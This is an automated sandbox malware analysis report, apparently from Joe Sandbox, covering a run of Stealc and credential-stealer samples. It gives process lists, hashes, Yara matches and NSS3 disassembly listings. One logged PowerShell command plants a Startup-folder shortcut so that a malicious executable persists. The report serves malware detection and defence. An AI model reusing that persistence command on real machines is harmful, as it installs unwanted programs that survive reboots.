                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.2613954644.00000000010DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.2587344921.00000000010EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.2618308087.00000000010EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.2614436981.00000000010EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.2587650360.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.2618538724.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.2585443365.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.2586452016.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.2569730542.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.2569764013.00000000010EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000017.00000003.2737641634.0000000008220000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.2587880421.00000000010EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                                                                        Start time:10:37:24
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x620000
                                                                                                                                                                                                                                                                                        File size:1'802'752 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:FE83CBC9270910772B2028F38444BB7F
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000018.00000003.2560756290.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000018.00000002.2622515140.0000000000621000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000018.00000002.2626496741.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                        • Detection: 39%, ReversingLabs
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                                                                        Start time:10:37:26
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                        File size:17'547'264 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:27DA32557EF397101BD519D5A3E00180
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                                                                        Start time:10:37:26
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fvgp.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exe'; $s.Save()"
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                                                                        Start time:10:37:26
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                                                                        Start time:10:37:28
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                                                                                        File size:3'183'104 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:219DA011BAD6CA9985808A7B2EF7C533
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                                                                        Start time:10:37:33
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                                                                                                                                                        File size:2'823'680 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:247F995931CCF613FE7C4DF0FC6DBAF0
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                        • Detection: 37%, ReversingLabs
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                                                                        Start time:10:37:39
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x5d0000
                                                                                                                                                                                                                                                                                        File size:3'135'488 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:FAD8A273ED15C30E16C4BA0C776A9727
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                                                                        Start time:10:37:47
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1005563001\309de20225.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x620000
                                                                                                                                                                                                                                                                                        File size:1'802'752 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:FE83CBC9270910772B2028F38444BB7F
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001F.00000002.2848404906.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001F.00000002.2847395793.0000000000621000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001F.00000003.2793400829.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                                                                        Start time:10:37:55
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                                                                                                                                                        File size:2'823'680 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:247F995931CCF613FE7C4DF0FC6DBAF0
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                                                                        Start time:10:38:03
                                                                                                                                                                                                                                                                                        Start date:11/11/2024
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1005562001\c61fcc859d.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x5d0000
                                                                                                                                                                                                                                                                                        File size:3'135'488 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:FAD8A273ED15C30E16C4BA0C776A9727
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                          Function 6C706E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C852120,6C707E60), ref: 6C706EBC
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C706EDF
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C706EF3
                                                                                                                                                                                                                                                                                          • PR_WaitCondVar.NSS3(000000FF), ref: 6C706F25
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6DA900: TlsGetValue.KERNEL32(00000000,?,6C8514E4,?,6C674DD9), ref: 6C6DA90F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6DA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C6DA94F
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C706F68
                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000008), ref: 6C706FA9
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C7070B4
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C7070C8
                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C8524C0,6C747590), ref: 6C707104
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C707117
                                                                                                                                                                                                                                                                                          • SECOID_Init.NSS3 ref: 6C707128
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000057), ref: 6C70714E
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C70717F
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7071A9
                                                                                                                                                                                                                                                                                          • PR_NotifyAllCondVar.NSS3 ref: 6C7071CF
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C7071DD
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C7071EE
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C707208
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C707221
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000001), ref: 6C707235
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C70724A
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C70725E
                                                                                                                                                                                                                                                                                          • PR_NotifyCondVar.NSS3 ref: 6C707273
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C707281
                                                                                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000), ref: 6C707291
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7072B1
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7072D4
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7072E3
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C707301
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C707310
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C707335
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C707344
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C707363
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C707372
                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C840148,,defaultModDB,internalKeySlot), ref: 6C7074CC
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C707513
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C70751B
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C707528
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C70753C
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C707550
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C707561
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C707572
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C707583
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C707594
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C7075A2
                                                                                                                                                                                                                                                                                          • SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C7075BD
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C7075C8
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C7075F1
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C707636
                                                                                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000), ref: 6C707686
                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C7076A2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B98D0: calloc.MOZGLUE(00000001,00000084,6C6E0936,00000001,?,6C6E102C), ref: 6C7B98E5
                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000050), ref: 6C7076B6
                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C707707
                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C70771C
                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C707731
                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C70774A
                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 6C707770
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C707779
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C70779A
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7077AC
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(-0000000D), ref: 6C7077C4
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C7077DB
                                                                                                                                                                                                                                                                                          • strrchr.VCRUNTIME140(?,0000002F), ref: 6C707821
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C707837
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C70785B
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C70786F
                                                                                                                                                                                                                                                                                          • SECMOD_AddNewModuleEx.NSS3 ref: 6C7078AC
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C7078BE
                                                                                                                                                                                                                                                                                          • SECMOD_AddNewModuleEx.NSS3 ref: 6C7078F3
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C7078FC
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C70791C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C67204A), ref: 6C6E07AD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C67204A), ref: 6C6E07CD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C67204A), ref: 6C6E07D6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C67204A), ref: 6C6E07E4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,6C67204A), ref: 6C6E0864
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6E0880
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,?,6C67204A), ref: 6C6E08CB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsGetValue.KERNEL32(?,?,6C67204A), ref: 6C6E08D7
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsGetValue.KERNEL32(?,?,6C67204A), ref: 6C6E08FB
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • ,defaultModDB,internalKeySlot, xrefs: 6C70748D, 6C7074AA
                                                                                                                                                                                                                                                                                          • dll, xrefs: 6C70788E
                                                                                                                                                                                                                                                                                          • rdb:, xrefs: 6C707744
                                                                                                                                                                                                                                                                                          • sql:, xrefs: 6C7076FE
                                                                                                                                                                                                                                                                                          • name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C7074C7
                                                                                                                                                                                                                                                                                          • Spac, xrefs: 6C707389
                                                                                                                                                                                                                                                                                          • dbm:, xrefs: 6C707716
                                                                                                                                                                                                                                                                                          • kbi., xrefs: 6C707886
                                                                                                                                                                                                                                                                                          • extern:, xrefs: 6C70772B
                                                                                                                                                                                                                                                                                          • NSS Internal Module, xrefs: 6C7074A2, 6C7074C6
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
                                                                                                                                                                                                                                                                                          • String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
                                                                                                                                                                                                                                                                                          • API String ID: 3465160547-3797173233
                                                                                                                                                                                                                                                                                          • Opcode ID: 9365d63bf2e61a25e66555b2c2003a077c9af1e6a4475f72c14d76dd1eb8e197
                                                                                                                                                                                                                                                                                          • Instruction ID: 6957ccdc14597a49142bf8d86af195c948905b377adee533d408fd5e1e028014
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9365d63bf2e61a25e66555b2c2003a077c9af1e6a4475f72c14d76dd1eb8e197
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E952CFF1E012059BEF219F64CE097AA7BF4AF0630CF148538ED09A6641EB75E958CBD1
                                                                                                                                                                                                                                                                                          Function 6C72BFF0 Relevance: 75.9, APIs: 31, Strings: 12, Instructions: 624memorystringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C72C0C8
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9440: LeaveCriticalSection.KERNEL32 ref: 6C7B95CD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9440: TlsGetValue.KERNEL32 ref: 6C7B9622
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9440: _PR_MD_NOTIFYALL_CV.NSS3 ref: 6C7B964E
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C72C0AE
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: LeaveCriticalSection.KERNEL32 ref: 6C7B91AA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B9212
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: _PR_MD_WAIT_CV.NSS3 ref: 6C7B926B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E0600: GetLastError.KERNEL32(?,?,?,?,?,6C6E05E2), ref: 6C6E0642
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E0600: TlsGetValue.KERNEL32(?,?,?,?,?,6C6E05E2), ref: 6C6E065D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E0600: GetLastError.KERNEL32 ref: 6C6E0678
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E0600: PR_snprintf.NSS3(?,00000014,error %d,00000000), ref: 6C6E068A
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E0600: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6E0693
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E0600: PR_SetErrorText.NSS3(00000000,?), ref: 6C6E069D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E0600: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,0318EBCC,?,?,?,?,?,6C6E05E2), ref: 6C6E06CA
